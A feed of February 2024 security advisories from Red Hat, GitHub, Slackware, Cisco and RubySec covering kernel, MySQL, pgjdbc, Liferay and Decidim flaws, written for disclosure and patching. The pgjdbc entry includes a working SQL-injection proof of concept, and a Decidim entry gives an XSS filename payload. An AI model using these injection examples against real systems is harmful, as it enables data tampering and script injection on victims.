* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)
* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)
* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)
* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)
* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)
* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)
* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)
* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)
* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)
* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)
* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)
* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)
* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)
* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)
* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)
* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)
* kernel: SEV-ES local priv escalation (CVE-2023-46813)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0881
20.02.2024 02:00:00 | redhat | [RHSA-2024:0889] oniguruma security update (moderate)

Oniguruma is a regular expressions library that supports a variety of character encodings.

Security Fix(es):

* oniguruma: Use-after-free in onig_new_deluxe() in regext.c (CVE-2019-13224)
* oniguruma: Stack exhaustion in regcomp.c because of recursion in regparse.c (CVE-2019-16163)
* oniguruma: integer overflow in search_in_range function in regexec.c leads to out-of-bounds read (CVE-2019-19012)
* oniguruma: Heap-based buffer over-read in function gb18030_mbc_enc_len in file gb18030.c (CVE-2019-19203)
* oniguruma: Heap-based buffer over-read in function fetch_interval_quantifier in regparse.c (CVE-2019-19204)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0889
20.02.2024 02:00:00 | redhat | [RHSA-2024:0897] kernel security update (important)

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)
* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)
* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)
* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)
* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)
* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)
* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)
* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)
* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)
* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)
* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)
* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)
* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)
* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)
* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)
* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)
* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)
* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)
* kernel: SEV-ES local priv escalation (CVE-2023-46813)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0897
20.02.2024 02:00:00 | redhat | [RHSA-2024:0894] mysql:8.0 security update (moderate)

MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.

Security Fix(es):

* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)
* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)
* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)
* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)
* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953, CVE-2023-21955)
* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)
* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)
* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)
* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)
* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)
* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)
* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)
* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046, CVE-2023-22054, CVE-2023-22056)
* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053)
* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)
* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)
* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)
* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)
* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)
* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)
* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)
* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)
* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)
* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)
* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-20970, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)
* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)
* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)
* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)
* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)
* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)
* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)
* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)
* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22452)

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0894
21.02.2024 02:04:53 | maven | [MAVEN:GHSA-XFG6-62PX-CXC2] SQL injection in pgjdbc (critical)

pgjdbc, the PostgreSQL JDBC Driver, allows an attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query, bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XFG6-62PX-CXC2
21.02.2024 01:59:30 | maven | [MAVEN:GHSA-4265-CCF5-PHJ5] Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file (high)

Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26.

Users are recommended to upgrade to version 1.26, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4265-CCF5-PHJ5
21.02.2024 01:58:09 | npm | [NPM:GHSA-5JJQ-8CVJ-V6M9] Cross-site Scripting in Serenity (moderate)

Serenity before 6.8.0 allows XSS via an email link because LoginPage.tsx permits return URLs that do not begin with a / character.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5JJQ-8CVJ-V6M9
22.02.2024 01:33:46 | maven | [MAVEN:GHSA-24RP-Q3W6-VC56] org.postgresql:postgresql vulnerable to SQL Injection via line comment generation (critical)

# Impact

SQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code that has a vulnerable SQL that negates a parameter value.

There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted.

# Exploitation

To exploit this behavior the following conditions must be met:

1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. `-`)
2. There must be a second placeholder for a string value after the first placeholder on the same line.
3. Both parameters must be user controlled.

The prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a `--` SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL.

When operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode are the parameter values inlined into the executed SQL, causing this issue.

# Example

```java
PreparedStatement stmt = conn.prepareStatement("SELECT -?, ?");
stmt.setInt(1, -1);
stmt.setString(2, "\nWHERE false --");
ResultSet rs = stmt.executeQuery();
```

The resulting SQL when operating in simple query mode would be (the newline in the second parameter is inlined verbatim):

```sql
SELECT --1,'
WHERE false --'
```

The contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands.

# Patch

The problem is patched; upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7.

The patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into:

```sql
SELECT -('-1'::int4), ('
WHERE false --')
```

# Workarounds

Do not use the connection property `preferQueryMode=simple`. (*NOTE: If you do not explicitly specify a query mode then you are using the default of `extended` and are not impacted by this issue.*)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-24RP-Q3W6-VC56
21.02.2024 22:04:41 | slackware | [SSA:2024-052-01] mozilla-thunderbird

New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-115.8.0-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.8.0/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-07/
    https://www.cve.org/CVERecord?id=CVE-2024-1546
    https://www.cve.org/CVERecord?id=CVE-2024-1547
    https://www.cve.org/CVERecord?id=CVE-2024-1548
    https://www.cve.org/CVERecord?id=CVE-2024-1549
    https://www.cve.org/CVERecord?id=CVE-2024-1550
    https://www.cve.org/CVERecord?id=CVE-2024-1551
    https://www.cve.org/CVERecord?id=CVE-2024-1552
    https://www.cve.org/CVERecord?id=CVE-2024-1553
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.8.0-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.8.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.8.0-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.8.0-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
d3d1b94d2a3b3f91332b715bd5d9de86 mozilla-thunderbird-115.8.0-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
44205eca60c837bd493a1b267159bb71 mozilla-thunderbird-115.8.0-x86_64-1_slack15.0.txz

Slackware -current package:
74dc8d5d260c5a7c72b08756c862a9d1 xap/mozilla-thunderbird-115.8.0-i686-1.txz

Slackware x86_64 -current package:
f1ba91048f709093600bd291bbfee65c xap/mozilla-thunderbird-115.8.0-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:

`# upgradepkg mozilla-thunderbird-115.8.0-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-052-01
21.02.2024 21:33:24 | maven | [MAVEN:GHSA-4HFP-M9GV-M753] XWiki extension license information is public, exposing instance id and license holder details (moderate)

### Impact

The licensor application includes the document `Licenses.Code.LicenseJSON` that provides information for admins regarding active licenses. This document is public and thus exposes this information publicly. The information includes the instance's id as well as first and last name and email of the license owner. This is a leak of information that isn't supposed to be public. The instance id allows associating data on the [active installs data](https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API/) with the concrete XWiki instance. Active installs assures that "there's no way to find who's having a given UUID" (referring to the instance id). Further, the information who the license owner is and information about the obtained licenses can be used for targeted phishing attacks. Also, while user information is normally public, email addresses might only be displayed obfuscated (depending on the configuration).

### Patches

This has been fixed in Application Licensing 1.24.2, by https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6

### Workarounds

There are no known workarounds besides upgrading.

### References

Fixed by https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4HFP-M9GV-M753

21.02.2024 18:00:00 | cisco | [CISCO-SA-CUIC-ACCESS-CONTROL-JJSZQMJJ] Cisco Unified Intelligence Center Insufficient Access Control Vulnerability (medium)

A vulnerability in the Live Data server of Cisco Unified Intelligence Center could allow an unauthenticated, local attacker to read and modify data in a repository that belongs to an internal service on an affected device.

This vulnerability is due to insufficient access control implementations on cluster configuration CLI requests. An attacker could exploit this vulnerability by sending a cluster configuration CLI request to specific directories on an affected device. A successful exploit could allow the attacker to read and modify data that is handled by an internal service on the affected device.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-access-control-jJsZQMjj

https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUIC-ACCESS-CONTROL-JJSZQMJJ

22.02.2024 01:19:55 | maven | [MAVEN:GHSA-Q2CV-7J58-RFMJ] Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting (critical)
Stored cross-site scripting (XSS) vulnerability in the Document and Media widget in Liferay Portal 7.4.3.18 through 7.4.3.101, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 18 through 92 allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a document's “Title” text field.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q2CV-7J58-RFMJ

22.02.2024 01:32:26 | maven | [MAVEN:GHSA-HGR6-6HHW-883F] Liferay Portal Calendar module and Liferay DXP vulnerable to Cross-site Scripting, content spoofing (moderate)
The Calendar module in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not escape user supplied data in the default notification email template, which allows remote authenticated users to inject arbitrary web script or HTML via the title of a calendar event or the user's name. This may lead to content spoofing or cross-site scripting (XSS) attacks depending on the capability of the receiver's mail client.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HGR6-6HHW-883F

22.02.2024 01:31:56 | maven | [MAVEN:GHSA-RWHV-HVJ2-QRQM] Liferay Portal Frontend JS module's portlet.js and Liferay DXP vulnerable to Cross-site Scripting (critical)
Cross-site scripting (XSS) vulnerability in the Frontend JS module's portlet.js in Liferay Portal 7.2.0 through 7.4.3.37, and Liferay DXP 7.4 before update 38, 7.3 before update 11, 7.2 before fix pack 20, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via the anchor (hash) part of a URL.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RWHV-HVJ2-QRQM

22.02.2024 01:30:55 | maven | [MAVEN:GHSA-RWXC-4CMW-7X75] Liferay Portal and Liferay DXP vulnerable to stored Cross-site Scripting (critical)
Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.2.0 through 7.4.3.13, and older unsupported versions, and Liferay DXP 7.4 before update 10, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the first/middle/last name text field of the user who creates an entry in the (1) Announcement widget, or (2) Alerts widget.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RWXC-4CMW-7X75

22.02.2024 01:30:21 | maven | [MAVEN:GHSA-73X3-8MRG-5R93] Liferay Portal Language Override edit screen and Liferay DXP vulnerable to reflected Cross-site Scripting (critical)
Reflected cross-site scripting (XSS) vulnerability in the Language Override edit screen in Liferay Portal 7.4.3.8 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 5, and 7.4 update 4 through 92 allows remote attackers to inject arbitrary web script or HTML via the `_com_liferay_portal_language_override_web_internal_portlet_PLOPortlet_key` parameter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-73X3-8MRG-5R93

22.02.2024 01:30:00 | maven | [MAVEN:GHSA-468X-FRCM-GHX6] Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting (critical)
Reflected cross-site scripting (XSS) vulnerability in the instance settings for Accounts in Liferay Portal 7.4.3.44 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 44 through 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the “Blocked Email Domains” text field.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-468X-FRCM-GHX6

22.02.2024 01:29:50 | maven | [MAVEN:GHSA-54PV-R62J-9QQC] Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting (critical)
Reflected cross-site scripting (XSS) vulnerability on the add assignees to a role page in Liferay Portal 7.3.3 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 6, 7.4 GA through update 92, and 7.3 before update 34 allows remote attackers to inject arbitrary web script or HTML via the `_com_liferay_roles_admin_web_portlet_RolesAdminPortlet_tabs2` parameter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-54PV-R62J-9QQC

22.02.2024 01:29:35 | maven | [MAVEN:GHSA-CR36-3VQF-X5W5] Liferay Portal Expando module and Liferay DXP vulnerable to stored Cross-site Scripting (critical)
Stored cross-site scripting (XSS) vulnerability in Expando module's geolocation custom fields in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the name text field of a geolocation custom field.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CR36-3VQF-X5W5

22.02.2024 01:29:25 | maven | [MAVEN:GHSA-V2XQ-M22W-JMPR] Liferay Portal and Liferay DXP's Users Admin module vulnerable to stored Cross-site Scripting (critical)
Stored cross-site scripting (XSS) vulnerability in Users Admin module's edit user page in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into an organization’s “Name” text field.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V2XQ-M22W-JMPR

22.02.2024 01:28:51 | maven | [MAVEN:GHSA-XPJG-7HX7-WGCX] Liferay Portal and Liferay DXP vulnerable to Cross-site Scripting (critical)
Cross-site scripting (XSS) vulnerability in HtmlUtil.escapeJsLink in Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via crafted javascript: style links.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XPJG-7HX7-WGCX

22.02.2024 01:28:35 | maven | [MAVEN:GHSA-P28X-4R5H-PH6J] Liferay Portal Message Board widget and Liferay DXP vulnerable to stored Cross-site Scripting (critical)
Stored cross-site scripting (XSS) vulnerability in Message Board widget in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the filename of an attachment.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P28X-4R5H-PH6J

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-2023-47634] Race condition in Endorsements (low)

### Impact

A race condition in the endorsement of resources (for instance, a proposal) allows a user to make more than one endorsement.

To exploit this vulnerability, the request to set an endorsement must be sent several times in parallel.

### Workarounds

Disable the Endorsement feature in the components.

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2023-47634

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-ADMIN-2023-48220] Possibility to circumvent the invitation token expiry period (medium)

### Impact

The invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.

When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:

https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198

The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:

https://github.com/scambra/devise_invitable#model-configuration

> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.

Decidim sets this configuration to `2.weeks` so this configuration should be respected:

https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134

The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.

### Patches

Update `devise_invitable` to version `2.0.9` or above by running the following command:

```
$ bundle update devise_invitable
```

### Workarounds

The invitations can be cancelled directly from the database by running the following command from the Rails console:

```
> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)
```

### References

OWASP ASVS V4.0.3-2.3.1

This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:

https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098

All versions since then are affected.

This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34

It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454

### Credits

This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-ADMIN-2023-48220

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-CORE-2023-51447] Cross-site scripting (XSS) in the dynamic file uploads (medium)

### Impact

The dynamic file upload feature is subject to a potential XSS attack in case the attacker manages to modify the file names of the records being uploaded to the server.

This appears in sections where the user controls the file upload dialogs themselves and has the technical knowledge to change the file names through the dynamic upload endpoint. Therefore I believe it would require the attacker to control the whole session of the particular user but in any case, this needs to be fixed.

Successful exploit of this vulnerability would require the user to have successfully uploaded a file blob to the server with a malicious file name and then have the possibility to direct the other user to the edit page of the record where the attachment is attached.

The users are able to craft the direct upload requests themselves controlling the file name that gets stored to the database as shown here:

https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14

The attacker is able to change the filename e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves. And then enter the returned blob ID to the form inputs manually by modifying the edit page source.

Therefore, anywhere we display these strings, we should properly escape them.

### Patches

PR #11612 fixes this problem both for 0.28.dev and 0.27.x.

### Workarounds

Disable dynamic uploads for the instance, e.g. from proposals.

### References

OWASP ASVS v4.0.3-5.1.3

### Credits

This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-CORE-2023-51447

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-SYSTEM-2023-48220] Possibility to circumvent the invitation token expiry period (medium)

### Impact

The invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.

When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:

https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198

The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:

https://github.com/scambra/devise_invitable#model-configuration

> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.

Decidim sets this configuration to `2.weeks` so this configuration should be respected:

https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134

The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.

### Patches

Update `devise_invitable` to version `2.0.9` or above by running the following command:

```
$ bundle update devise_invitable
```

### Workarounds

The invitations can be cancelled directly from the database by running the following command from the Rails console:

```
> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)
```

### References

OWASP ASVS V4.0.3-2.3.1

This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:

https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098

All versions since then are affected.

This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34

It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454

### Credits

This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-SYSTEM-2023-48220

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-TEMPLATES-2023-47635] Possible CSRF attack at questionnaire templates preview (medium)

### Impact

The CSRF authenticity token check is currently disabled for the questionnaire templates preview as per:

https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11

This was introduced by this commit in the PR that introduced this feature (#6247):

https://github.com/decidim/decidim/pull/6247/commits/5542227be66e3b6d7530f5b536069bce09376660

The issue does not imply a serious security threat as you need to have access also to the session cookie in order to see this resource. This URL does not allow modifying the resource but it may allow attackers to gain access to information which was not meant to be public.

### Patches

#11743

### Workarounds

Disable the templates functionality or remove all available templates.

### References

#11743

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-TEMPLATES-2023-47635

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-2023-48220] Possibility to circumvent the invitation token expiry period (medium)

### Impact

